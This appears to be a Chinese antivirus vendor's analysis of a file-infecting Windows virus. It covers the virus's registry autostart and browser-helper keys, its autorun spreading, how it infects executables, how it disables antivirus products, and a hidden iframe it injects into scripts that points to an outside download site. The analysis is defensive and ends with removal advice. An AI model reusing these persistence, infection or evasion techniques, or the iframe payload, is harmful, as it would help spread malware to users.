病毒运行后首先会查找System32路径下是否存在mscrss.exe这个文件,如果没有则进行初始化过程,如果有则进行感染过程。
初始化过程:
首先创建一个名为Peinfect的互斥体防止进程中有多个病毒实例运行。
然后病毒会把自己拷到System32路径下并命名为mscrss.exe同时释放动态库文件mscrss.dll。
添加以下键值实现自启动:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Windows WorkStation
Windows WorkStation = C:\WINDOWS\system32\mscrss.exe,
添加以下键值把动态库注册为浏览器帮助对象,使得用户启动浏览器的同时也加载病毒释放的动态库:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{C1498DA0-135E-46ea-B01B-86042A31ED82}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{C1498DA0-135E-46ea-B01B-86042A31ED82} = C:\WINDOWS\system32\mscrss.dll
在释放动态库文件之前,病毒会遍历进程查找进程中是否存在360安全卫士的进程360tray.exe,如果存在则结束该进程。
最后病毒会遍历磁盘,遍历磁盘,把自己命名为mscrss.exe拷备到所有的磁盘中,添加autorun.inf使用户双击打开磁盘时同时运行病毒。
感染过程:
病毒会感染除了windows、 winnt、 Program Files文件夹下的所有可执行程序和脚本文件。
对于可执行文件,病毒会在可执行文件的资源节添加一个类型为RCDATA名为PERES的资源并把自己复制进去,在可执行文件最后添加一个名为.ada的节,该节大小为0x1000,存放一段解密代码,修改程序入口,使得用户运行可执行文件时先执行解密代码,把病毒释放到Temp文件夹中,运行病毒,该节开头同时记着可执行文件的原入口,恢复完病毒程序后,跳到程序的原入口执行正常程序。如果程序的资源节被加密,病毒无法正确读取资源节,该病毒会把这类文件感染坏,导致这些程序在被感染后无法正常运行。
对于脚本文件,病毒会在脚本的最后添加以下代码使得用户运行脚本时同时从该网址下载未知程序<iframe src="http://pk.yhgames.com/index.htm" width="0" height="0"></iframe>。
动态库文件主要用来下载文件和反杀毒软件,动态库被加载起来后首先会判断自己是在哪个进程中,如果是iexplore.exe则实现下载功能,如果是explorer.exe则实现反病毒软件功能。
下载功能:
病毒会首先创建一个名为MY_MAIN_JNJECT的互斥体防止进程中有多个病毒实例运行。然后从http://XXXXX.XXXXX.com/iedown/down/upbho.exe网址下载未知程序存到C:\Documents and Settings\op\Local Settings\Temporary Internet Files文件夹的LoadName1.exe、LoadName2.exe、LoadName3.ex这些文件中并运行这些程序。
反杀毒软件功能:
病毒每隔8秒会遍历进程查找卡巴斯基杀毒软件进程avp.exe,如果找到则把当前系统时间的年份修改为1997使该杀毒软件失效。
安全建议:
1 安装正版杀毒软件、个人防火墙和卡卡上网安全助手,并及时升级,瑞星杀毒软件每天至少升级三次。
2 使用“瑞星系统安全漏洞扫描”,打好补丁,弥补系统漏洞。
3 不浏览不良网站,不随意下载安装可疑插件。
4 不接收QQ、MSN、Emial等传来的可疑文件。
5 上网时打开杀毒软件实时监控功能。
6 把网银、网游、QQ等重要软件加入到“瑞星帐号保险柜”中,可以有效保护密码安全。
清除办法:
瑞星杀毒软件清除办法:
安装瑞星杀毒软件,升级到20.17.12版以上,对电脑进行全盘扫描,按照软件提示进行操作,即可彻底查杀。